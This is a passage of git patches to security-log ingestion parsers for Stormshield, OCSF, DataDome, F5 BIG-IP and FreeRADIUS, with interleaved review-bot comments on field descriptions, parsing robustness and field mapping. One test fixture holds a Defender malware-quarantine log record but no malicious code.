-action.properties.origin_id: +action.properties.OriginId: description: stormshield property Origin ID - name: action.properties.origin_id + name: action.properties.OriginId type: keyword -action.properties.origin_name: +action.properties.OriginName: description: stormshield property Origin Name - 
name: action.properties.origin_name + name: action.properties.OriginName type: keyword -action.properties.path: +action.properties.Path: description: stormshield property Path - name: action.properties.path + name: action.properties.Path type: keyword -action.properties.post_clean_status: +action.properties.PostCleanStatus: description: stormshield property Post Clean Status - name: action.properties.post_clean_status + name: action.properties.PostCleanStatus type: keyword -action.properties.pre_execution_status: +action.properties.PreExecutionStatus: description: stormshield property Pre Execution Status - name: action.properties.pre_execution_status + name: action.properties.PreExecutionStatus type: keyword -action.properties.process_name: +action.properties.ProcessName: description: stormshield property Process Name - name: action.properties.process_name + name: action.properties.ProcessName type: keyword -action.properties.product_name: +action.properties.ProductName: description: stormshield property Product Name - name: action.properties.product_name + name: action.properties.ProductName type: keyword -action.properties.product_version: +action.properties.ProductVersion: description: stormshield property Product Version - name: action.properties.product_version + name: action.properties.ProductVersion type: keyword -action.properties.remediation_user: +action.properties.RemediationUser: description: stormshield property Remediation User - name: action.properties.remediation_user + name: action.properties.RemediationUser type: keyword -action.properties.security_intelligence_version: +action.properties.SecurityIntelligenceVersion: description: stormshield property Security intelligence Version - name: action.properties.security_intelligence_version + name: action.properties.SecurityIntelligenceVersion type: keyword -action.properties.severity_id: +action.properties.SeverityId: description: stormshield property Severity ID - name: action.properties.severity_id 
+ name: action.properties.SeverityId type: keyword -action.properties.severity_name: +action.properties.SeverityName: description: stormshield property Severity Name - name: action.properties.severity_name + name: action.properties.SeverityName type: keyword -action.properties.source_id: +action.properties.SourceId: description: stormshield property Source ID - name: action.properties.source_id + name: action.properties.SourceId type: keyword -action.properties.source_name: +action.properties.SourceName: description: stormshield property Source Name - name: action.properties.source_name + name: action.properties.SourceName type: keyword -action.properties.state: +action.properties.State: description: stormshield property State - name: action.properties.state + name: action.properties.State type: keyword -action.properties.status_code: +action.properties.StatusCode: description: stormshield property Status Code - name: action.properties.status_code + name: action.properties.StatusCode + type: keyword + +action.properties.TargetCommandLine: + description: stormshield targeted process command line + name: action.properties.TargetCommandLine + type: keyword + +action.properties.TargetImage: + description: stormshield targeted process executable + name: action.properties.TargetImage type: keyword -action.properties.task: +action.properties.Task: description: stormshield action task - name: action.properties.task + name: action.properties.Task type: keyword -action.properties.threat_id: +action.properties.ThreatId: description: stormshield property Threat ID - name: action.properties.threat_id + name: action.properties.ThreatId type: keyword -action.properties.threat_name: +action.properties.ThreatName: description: stormshield property Threat Name - name: action.properties.threat_name + name: action.properties.ThreatName type: keyword -action.properties.type_id: +action.properties.TypeId: description: stormshield property Type ID - name: action.properties.type_id + 
name: action.properties.TypeId type: keyword -action.properties.type_name: +action.properties.TypeName: description: stormshield property Type Name - name: action.properties.type_name + name: action.properties.TypeName type: keyword action.record_id: diff --git a/Stormshield/stormshield-endpoint-security/ingest/parser.yml b/Stormshield/stormshield-endpoint-security/ingest/parser.yml index 5a7c52b3a..44447383b 100644 --- a/Stormshield/stormshield-endpoint-security/ingest/parser.yml +++ b/Stormshield/stormshield-endpoint-security/ingest/parser.yml 
@@ -169,43 +169,43 @@ stages:
 process.thread.id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.System.Execution.ThreadID}}"
 action.id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.System.EventID}}"
 action.record_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.System.EventRecordID}}"
- action.properties.opcode: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.System.OpCode}}"
- action.properties.task: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.System.Task}}"
- action.properties.product_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Product Name')}}"
- action.properties.product_version: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Product Version')}}"
- action.properties.detection_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Detection ID')}}"
- action.properties.detection_time: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Detection Time')}}"
- action.properties.threat_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Threat ID')}}"
- action.properties.threat_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Threat Name')}}"
- action.properties.severity_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Severity ID')}}"
- action.properties.severity_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Severity Name')}}"
- action.properties.category_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Category ID')}}"
- action.properties.category_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Category Name')}}"
- action.properties.fwlink: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('FWLink')}}"
- action.properties.status_code: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Status Code')}}"
- action.properties.state: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('State')}}"
- action.properties.source_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Source ID')}}"
- action.properties.source_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Source Name')}}"
- action.properties.process_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Process Name')}}"
- action.properties.detection_user: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Detection User')}}"
- action.properties.path: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Path')}}"
- action.properties.origin_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Origin ID')}}"
- action.properties.origin_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Origin Name')}}"
- action.properties.execution_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Execution ID')}}"
- action.properties.execution_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Execution Name')}}"
- action.properties.type_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Type ID')}}"
- action.properties.type_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Type Name')}}"
- action.properties.pre_execution_status: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Pre Execution Status')}}"
- action.properties.action_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Action ID')}}"
- action.properties.action_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Action Name')}}"
- action.properties.error_code: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Error Code')}}"
- action.properties.error_description: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Error Description')}}"
- action.properties.post_clean_status: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Post Clean Status')}}"
- action.properties.additional_actions_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Additional Actions ID')}}"
- action.properties.additional_actions_string: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Additional Actions String')}}"
- action.properties.remediation_user: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Remediation User')}}"
- action.properties.security_intelligence_version: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Security intelligence Version')}}"
- action.properties.engine_version: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Engine Version')}}"
+ action.properties.Opcode: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.System.OpCode}}"
+ action.properties.Task: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.System.Task}}"
+ action.properties.ProductName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Product Name')}}"
+ action.properties.ProductVersion: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Product Version')}}"
+ action.properties.DetectionId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Detection ID')}}"
+ action.properties.DetectionTime: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Detection Time')}}"
+ action.properties.ThreatId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Threat ID')}}"
+ action.properties.ThreatName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Threat Name')}}"
+ action.properties.SeverityId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Severity ID')}}"
+ action.properties.SeverityName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Severity Name')}}"
+ action.properties.CategoryId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Category ID')}}"
+ action.properties.CategoryName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Category Name')}}"
+ action.properties.Fwlink: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('FWLink')}}"
+ action.properties.StatusCode: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Status Code')}}"
+ action.properties.State: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('State')}}"
+ action.properties.SourceId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Source ID')}}"
+ action.properties.SourceName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Source Name')}}"
+ action.properties.ProcessName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Process Name')}}"
+ action.properties.DetectionUser: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Detection User')}}"
+ action.properties.Path: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Path')}}"
+ action.properties.OriginId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Origin ID')}}"
+ action.properties.OriginName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Origin Name')}}"
+ action.properties.ExecutionId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Execution ID')}}"
+ action.properties.ExecutionName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Execution Name')}}"
+ action.properties.TypeId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Type ID')}}"
+ action.properties.TypeName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Type Name')}}"
+ action.properties.PreExecutionStatus: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Pre Execution Status')}}"
+ action.properties.ActionId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Action ID')}}"
+ action.properties.ActionName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Action Name')}}"
+ action.properties.ErrorCode: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Error Code')}}"
+ action.properties.ErrorDescription: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Error Description')}}"
+ action.properties.PostCleanStatus: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Post Clean Status')}}"
+ action.properties.AdditionalActionsId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Additional Actions ID')}}"
+ action.properties.AdditionalActionsString: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Additional Actions String')}}"
+ action.properties.RemediationUser: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Remediation User')}}"
+ action.properties.SecurityIntelligenceVersion: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Security intelligence Version')}}"
+ action.properties.EngineVersion: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Engine Version')}}"
 filter: "{{json_event.message.Type == 20048}}"
 - set:
diff --git a/Stormshield/stormshield-endpoint-security/tests/test_type_20048_1.json b/Stormshield/stormshield-endpoint-security/tests/test_type_20048_1.json index 76705eb03..4cf024c43 100644 --- a/Stormshield/stormshield-endpoint-security/tests/test_type_20048_1.json +++ b/Stormshield/stormshield-endpoint-security/tests/test_type_20048_1.json 
@@ -20,42 +20,42 @@
 "action": {
 "id": "1117",
 "properties": {
- "action_id": "2",
- "action_name": "Quarantine",
- "additional_actions_id": "0",
- "additional_actions_string": "No additional actions required",
- "category_id": "8",
- "category_name": "Trojan",
- "detection_id": "{9C26ADFE-43AA-4884-9765-A2EC223DC7E0}",
- "detection_time": "2024-03-22T14:01:20.550Z",
- "detection_user": "DESKTOP-001\\Lab",
- "engine_version": "AM: 1.1.24020.9, NIS: 1.1.24020.9",
- "error_code": "0x00000000",
- "error_description": "The operation completed successfully. ",
- "execution_id": "0",
- "execution_name": "Unknown",
- "fwlink": "https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/BatTamper.A&threatid=2147818424&enterprise=0",
- "origin_id": "4",
- "origin_name": "Internet",
- "path": "file:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1; webfile:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1|https://github.com/|pid:13760,ProcessStart:133555896788321048",
- "post_clean_status": "0",
- "pre_execution_status": "0",
- "process_name": "Unknown",
- "product_name": "Microsoft Defender Antivirus",
- "product_version": "4.18.23110.3",
- "remediation_user": "NT AUTHORITY\\SYSTEM",
- "security_intelligence_version": "AV: 1.407.619.0, AS: 1.407.619.0, NIS: 1.407.619.0",
- "severity_id": "5",
- "severity_name": "Severe",
- "source_id": "4",
- "source_name": "Downloads and attachments",
- "state": "2",
- "status_code": "4",
- "task": "0",
- "threat_id": "2147818424",
- "threat_name": "Trojan:Win32/BatTamper.A",
- "type_id": "0",
- "type_name": "Concrete"
+ "ActionId": "2",
+ "ActionName": "Quarantine",
+ "AdditionalActionsId": "0",
+ "AdditionalActionsString": "No additional actions required",
+ "CategoryId": "8",
+ "CategoryName": "Trojan",
+ "DetectionId": "{9C26ADFE-43AA-4884-9765-A2EC223DC7E0}",
+ "DetectionTime": "2024-03-22T14:01:20.550Z",
+ "DetectionUser": "DESKTOP-001\\Lab",
+ "EngineVersion": "AM: 1.1.24020.9, NIS: 1.1.24020.9",
+ "ErrorCode": "0x00000000",
+ "ErrorDescription": "The operation completed successfully. ",
+ "ExecutionId": "0",
+ "ExecutionName": "Unknown",
+ "Fwlink": "https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/BatTamper.A&threatid=2147818424&enterprise=0",
+ "OriginId": "4",
+ "OriginName": "Internet",
+ "Path": "file:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1; webfile:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1|https://github.com/|pid:13760,ProcessStart:133555896788321048",
+ "PostCleanStatus": "0",
+ "PreExecutionStatus": "0",
+ "ProcessName": "Unknown",
+ "ProductName": "Microsoft Defender Antivirus",
+ "ProductVersion": "4.18.23110.3",
+ "RemediationUser": "NT AUTHORITY\\SYSTEM",
+ "SecurityIntelligenceVersion": "AV: 1.407.619.0, AS: 1.407.619.0, NIS: 1.407.619.0",
+ "SeverityId": "5",
+ "SeverityName": "Severe",
+ "SourceId": "4",
+ "SourceName": "Downloads and attachments",
+ "State": "2",
+ "StatusCode": "4",
+ "Task": "0",
+ "ThreatId": "2147818424",
+ "ThreatName": "Trojan:Win32/BatTamper.A",
+ "TypeId": "0",
+ "TypeName": "Concrete"
 },
 "record_id": "613"
 },
From 3b400f99bfbbdc2499dd26883b08176aa8494a93 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Thu, 19 Sep 2024 11:20:23 +0200
Subject: [PATCH 058/317] fix(OCSF): remove single quote apply @lvoloshyn-sekoia's comment
---
 OCSF/ocsf/ingest/parser.yml | 2 +-
 OCSF/ocsf/tests/test_vulnerability_finding_1.json | 3 +-
 2 files changed, 2 insertions(+), 3 deletions(-)
diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 7284638f6..19713e433 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -940,7 +940,7 @@ stages:
 vulnerability.score.version: "{{parse_event.message.vulnerabilities[0].cve.cvss.version}}"
 vulnerability.description: "{{parse_event.message.vulnerabilities[0].desc}}"
 vulnerability.score.base: "{{parse_event.message.vulnerabilities[0].cve.cvss.base_score | float}}"
- vulnerability.severity: "{{parse_event.message.vulnerabilities[0].severity}}'"
+ vulnerability.severity: "{{parse_event.message.vulnerabilities[0].severity}}"
 vulnerability.scanner.vendor: "{{parse_event.message.vulnerabilities[0].vendor_name}}"
 filter: "{{parse_event.message.get('vulnerabilities', []) | length > 0}}"
diff --git a/OCSF/ocsf/tests/test_vulnerability_finding_1.json b/OCSF/ocsf/tests/test_vulnerability_finding_1.json
index 47b46332d..fbabdddd0 100644
--- a/OCSF/ocsf/tests/test_vulnerability_finding_1.json
+++ b/OCSF/ocsf/tests/test_vulnerability_finding_1.json
@@ -32,8 +32,7 @@
 "id": "CVE-2023-1255",
 "scanner": {
 "vendor": "NVD"
- },
- "severity": "'"
+ }
 }
 }
 }
\ No newline at end of file
From 6647c5f0ee2acb0d157536e4c4e0e43c9c5c0304 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia
Date: Thu, 19 Sep 2024 15:04:41 +0300
Subject: [PATCH 059/317] DataDome - extract more fields
---
 Datadome/datadome-protection/_meta/fields.yml | 29 +++++++++++++++++++
 .../datadome-protection/ingest/parser.yml | 7 +++++
 .../datadome-protection/tests/test_alert.json | 8 +++++
 .../tests/test_alert_with_duration.json | 8 +++++
 4 files changed, 52 insertions(+)
diff --git a/Datadome/datadome-protection/_meta/fields.yml b/Datadome/datadome-protection/_meta/fields.yml
index e69de29bb..e1bcc0e85 100644
--- a/Datadome/datadome-protection/_meta/fields.yml
+++ b/Datadome/datadome-protection/_meta/fields.yml
@@ -0,0 +1,29 @@
+datadome.country_count:
+ description: ''
+ name: datadome.country_count
+ type: number
+
+datadome.ip_count:
+ description: ''
+ name: datadome.ip_count
+ type: number
+
+datadome.peak_speed:
+ description: ''
+ name: datadome.peak_speed
+ type: number
+
+datadome.requests_count:
+ description: ''
+ name: datadome.requests_count
+ type: number
+
+datadome.ua_count:
+ description: ''
+ name: datadome.ua_count
+ type: number
+
+datadome.url_count:
+ description: ''
+ name: datadome.url_count
+ type: number
diff --git a/Datadome/datadome-protection/ingest/parser.yml b/Datadome/datadome-protection/ingest/parser.yml
index 07ff32e88..509c7364a 100644
--- a/Datadome/datadome-protection/ingest/parser.yml
+++ b/Datadome/datadome-protection/ingest/parser.yml
@@ -56,3 +56,10 @@ stages:
 cloud.account.name: "{{parsed_event.message.accountName}}"
 host.name: "{{parsed_event.message.endpointName}}"
 threat.indicator.name: "{{parsed_event.message.threatName}}"
+
+ datadome.requests_count: "{{parsed_event.message.requestsCount.replace(',', '') | int}}"
+ datadome.peak_speed: "{{parsed_event.message.peakSpeed.replace(',', '') | int}}"
+ datadome.ip_count: "{{parsed_event.message.ipCount.replace(',', '') | int}}"
+ datadome.ua_count: "{{parsed_event.message.uaCount.replace(',', '') | int}}"
+ datadome.country_count: "{{parsed_event.message.countryCount.replace(',', '') | int}}"
+ datadome.url_count: "{{parsed_event.message.urlCount.replace(',', '') | int}}"
diff --git a/Datadome/datadome-protection/tests/test_alert.json b/Datadome/datadome-protection/tests/test_alert.json
index a1c4e1027..0d535d93b 100644
--- a/Datadome/datadome-protection/tests/test_alert.json
+++ b/Datadome/datadome-protection/tests/test_alert.json
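Review bot: Every one of the six new `datadome.*` declarations has `description: ''`, so the taxonomy says nothing about what `peak_speed` measures or which alert attribute each count is taken from. A one-line description per field, derived from the parser hunk in the same commit, would do, e.g. `description: Number of requests in the alert (requestsCount)` for `datadome.requests_count`. For `datadome.peak_speed` the unit is not recoverable from the diff (requests per second is a guess to confirm against DataDome's alert format) and should be stated in the description or carried in the field name once known.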
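Review bot: `parsed_event.message.requestsCount.replace(',', '')` and the five lines after it call `.replace` on the raw attribute without checking that it is present and a string, so an alert that omits one of these keys, or sends it as a JSON number, breaks the expression and the whole `set` action — all six counts — is lost together; the existing lines above access attributes just as directly but do no method call on them. A guard per line keeps each count independent, e.g. `datadome.requests_count: "{{ (parsed_event.message.requestsCount | string).replace(',', '') | int }}"`, preferably combined with a filter on the key's presence. The `peak_speed: 0` expected in test_alert.json deserves a look in the same spirit: if the engine's `int` filter behaves like Jinja's and yields 0 for an unparsable value, that fixture cannot tell a genuine zero from a conversion failure.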
@@ -20,6 +20,14 @@
 "name": "Example account"
 }
 },
+ "datadome": {
+ "country_count": 123456789,
+ "ip_count": 123456789,
+ "peak_speed": 0,
+ "requests_count": 123456789,
+ "ua_count": 123456789,
+ "url_count": 123456789
+ },
 "host": {
 "name": "WEB (default)"
 },
diff --git a/Datadome/datadome-protection/tests/test_alert_with_duration.json b/Datadome/datadome-protection/tests/test_alert_with_duration.json
index 0dd928c38..22a05ed8c 100644
--- a/Datadome/datadome-protection/tests/test_alert_with_duration.json
+++ b/Datadome/datadome-protection/tests/test_alert_with_duration.json
@@ -28,6 +28,14 @@
 "name": "Account name"
 }
 },
+ "datadome": {
+ "country_count": 17,
+ "ip_count": 393,
+ "peak_speed": 1457,
+ "requests_count": 10558,
+ "ua_count": 82,
+ "url_count": 2221
+ },
 "host": {
 "name": "Endpoint"
 },
From ccf710da39758cd830cbc5bf128adbf8e33879b2 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia
Date: Thu, 19 Sep 2024 17:06:19 +0300
Subject: [PATCH 060/317] F5 Big-Ip: parse Rule event wo details
---
 F5 Networks/f5-big-ip/ingest/parser.yml | 3 ++-
 F5 Networks/f5-big-ip/tests/test_rule8.json | 24 +++++++++++++++++++
 2 files changed, 26 insertions(+), 1 deletion(-)
 create mode 100644 F5 Networks/f5-big-ip/tests/test_rule8.json
diff --git a/F5 Networks/f5-big-ip/ingest/parser.yml b/F5 Networks/f5-big-ip/ingest/parser.yml
index 4ccce0e6b..d100bdf97 100644
--- a/F5 Networks/f5-big-ip/ingest/parser.yml
+++ b/F5 Networks/f5-big-ip/ingest/parser.yml
@@ -8,7 +8,7 @@ pipeline:
 name: grok.match
 properties:
 output_field: message
- pattern: '\s?(%{CRON_LOG}|%{LOGGER_LOG}|%{SSH_LOG}|%{RULE_LOG}|%{AUDIT_LOG}|%{ARROW}|%{VPN_LOG})'
+ pattern: '\s?(%{CRON_LOG}|%{LOGGER_LOG}|%{SSH_LOG}|%{RULE_LOG}|%{RULE_LOG_REASON_ONLY}|%{AUDIT_LOG}|%{ARROW}|%{VPN_LOG})'
 custom_patterns:
 TLS: "TLSv"
 HEADER: '%{WORD:action_type}\[\d*\]'
@@ -35,6 +35,7 @@ pipeline:
 RULE_HTTP_REQUEST: ": LOGS: %{RULE_LOG_MESSAGE:rule_message}"
 RULE_HTTP_RESPONSE: ": %{IPORHOST:destination_ip}:%{POSINT:destination_port}: HTTP: %{POSINT:http_response_status_code} response to( %{IPORHOST:destination_ip}:%{POSINT:destination_port})? from( %{IPORHOST:source_ip}:%{POSINT:source_port} )?URL: %{NOTSPACE:url_original} %{DATA} %{TLS:tls_version_protocol}%{NUMBER:tls_version}"
 RULE_LOG: "%{HEADER}: Rule %{NOTSPACE:rule_name} (%{RULE_HTTP_REQUEST}|%{RULE_HTTP_RESPONSE})"
+ RULE_LOG_REASON_ONLY: '(%{HEADER}:\s?)? Rule %{NOTSPACE:rule_name} \: %{GREEDYDATA:rule_message}'
 # audit message
 AUDIT_LOG: '%{HEADER}:\s(\d*:\d*: )AUDIT - %{GREEDYDATA:audit_message}'
diff --git a/F5 Networks/f5-big-ip/tests/test_rule8.json b/F5 Networks/f5-big-ip/tests/test_rule8.json
new file mode 100644
index 000000000..17a6db8ab
--- /dev/null
+++ b/F5 Networks/f5-big-ip/tests/test_rule8.json
@@ -0,0 +1,24 @@
+{
+ "input": {
+ "message": " Rule /Common/irule_insert_vs_name : le nom de la vs a inserer est example.com"
+ },
+ "expected": {
+ "message": " Rule /Common/irule_insert_vs_name : le nom de la vs a inserer est example.com",
+ "event": {
+ "category": [
+ "network"
+ ],
+ "reason": "le nom de la vs a inserer est example.com",
+ "type": [
+ "info"
+ ]
+ },
+ "os": {
+ "family": "linux",
+ "platform": "linux"
+ },
+ "rule": {
+ "name": "/Common/irule_insert_vs_name"
+ }
+ }
+}
\ No newline at end of file
From 9620fe97184621d0b2202d48ba91959998aa889a Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia
Date: Thu, 19 Sep 2024 17:18:51 +0300
Subject: [PATCH 061/317] Freeradius - extract server name
---
 FreeRADIUS/freeradius/ingest/parser.yml | 3 +-
 .../tests/test_ignoring_request.json | 3 ++
 .../test_ignoring_request_non_default.json | 39 +++++++++++++++++++
 3 files changed, 44 insertions(+), 1 deletion(-)
 create mode 100644 FreeRADIUS/freeradius/tests/test_ignoring_request_non_default.json
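Review bot: The new `RULE_LOG_REASON_ONLY` pattern carries no comment, whereas the neighbouring `AUDIT_LOG` is introduced by `# audit message`; a line such as `# rule message with a free-text reason and no HTTP request/response details` above it would tell the next reader why a second `Rule` pattern exists and why its header group is optional. Two points of style: `\:` escapes a character that is not special in the pattern, so `: %{GREEDYDATA:rule_message}` is equivalent and easier to read, and because `(%{HEADER}:\s?)?` is optional, `action_type` is not captured for these events — consistent with test_rule8.json, which expects no action field, but worth stating in that comment so the absence is understood as intended.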
diff --git a/FreeRADIUS/freeradius/ingest/parser.yml b/FreeRADIUS/freeradius/ingest/parser.yml
index 2c93113c1..90da80fc5 100644
--- a/FreeRADIUS/freeradius/ingest/parser.yml
+++ b/FreeRADIUS/freeradius/ingest/parser.yml
@@ -9,7 +9,7 @@ pipeline:
 pattern: "%{USUAL}|%{IGNREQ}"
 custom_patterns:
 USUAL: '\s?\(%{INT}\)\s%{DATA:event_outcome}(\s\((eap_peap\:\s)?%{GREEDYDATA:event_reason}\))?\)?:\s\[%{USER}\]\s\(from\sclient\s%{DATA:origin}\sport\s%{INT:client_port}(\scli\s(%{MAC:client_mac}|%{IP:client_ip}|(?P[0-9A-Fa-f]{12})))?(\svia\s%{PROTOCOL})?\)'
- IGNREQ: '\s?%{DATA:event_outcome} (%{IP:destination_ip}|\*) port %{INT:destination_port} bound to server default from unknown client %{IP:client_ip} port %{INT:client_port} proto %{DATA:network_transport}'
+ IGNREQ: '\s?%{DATA:event_outcome} (%{IP:destination_ip}|\*) port %{INT:destination_port} bound to server %{DATA:server_name} from unknown client %{IP:client_ip} port %{INT:client_port} proto %{DATA:network_transport}'
 USER: "%{USER_EMAIL:user_email}|%{HOST}|%{DOM}|%{DATA:user_name}"
 HOST: "host/%{HOSTNAME:client_domain}"
 DOM: '%{DATA:user_domain}\\%{HOSTNAME:user_name}'
@@ -43,6 +43,7 @@ stages:
 network.protocol: "{{ parsing.message.network_protocol }}"
 network.transport: "{{ parsing.message.network_transport }}"
 freeradius.outcome: "{{ parsing.message.event_outcome }}"
+ host.name: "{{ parsing.message.server_name }}"
 - set:
 source.ip: "{{ parsing.message.client_ip }}"
diff --git a/FreeRADIUS/freeradius/tests/test_ignoring_request.json b/FreeRADIUS/freeradius/tests/test_ignoring_request.json
index 4a7268614..595858b70 100644
--- a/FreeRADIUS/freeradius/tests/test_ignoring_request.json
+++ b/FreeRADIUS/freeradius/tests/test_ignoring_request.json
@@ -19,6 +19,9 @@
 "freeradius": {
 "outcome": "Ignoring request to auth address"
 },
+ "host": {
+ "name": "default"
+ },
 "network": {
 "transport": "udp"
 },
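Review bot: `host.name: "{{ parsing.message.server_name }}"` stores the FreeRADIUS virtual-server name (`default` and `Wifi-LDAP` in this commit's fixtures) in the ECS field that identifies the host which produced the event, so anything keyed on `host.name` — asset pivots, correlation rules, allow-lists — would now see `default` as a hostname. A vendor-namespaced field beside `freeradius.outcome`, e.g. `freeradius.server_name: "{{ parsing.message.server_name }}"` declared in fields.yml, keeps the value without overloading host identity. The `IGNREQ` change in the first hunk is fine as the capture itself; only the mapping target is the concern.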
diff --git a/FreeRADIUS/freeradius/tests/test_ignoring_request_non_default.json b/FreeRADIUS/freeradius/tests/test_ignoring_request_non_default.json
new file mode 100644
index 000000000..cdd39b172
--- /dev/null
+++ b/FreeRADIUS/freeradius/tests/test_ignoring_request_non_default.json
@@ -0,0 +1,39 @@
+{
+ "input": {
+ "message": "Ignoring request to auth address * port 1823 bound to server Wifi-LDAP from unknown client 1.2.2.3 port 1645 proto udp"
+ },
+ "expected": {
+ "message": "Ignoring request to auth address * port 1823 bound to server Wifi-LDAP from unknown client 1.2.2.3 port 1645 proto udp",
+ "event": {
+ "category": [
+ "authentication"
+ ],
+ "dataset": "freeradius.authentication",
+ "type": [
+ "info"
+ ]
+ },
+ "destination": {
+ "port": 1823
+ },
+ "freeradius": {
+ "outcome": "Ignoring request to auth address"
+ },
+ "host": {
+ "name": "Wifi-LDAP"
+ },
+ "network": {
+ "transport": "udp"
+ },
+ "related": {
+ "ip": [
+ "1.2.2.3"
+ ]
+ },
+ "source": {
+ "address": "1.2.2.3",
+ "ip": "1.2.2.3",
+ "port": 1645
+ }
+ }
+}
\ No newline at end of file
From 79e0606c0e679421ab975830f2e9af454c8cc7e9 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Thu, 19 Sep 2024 17:07:23 +0200
Subject: [PATCH 062/317] fix(Harfanglab): add new action.properties fields in the taxonomy
---
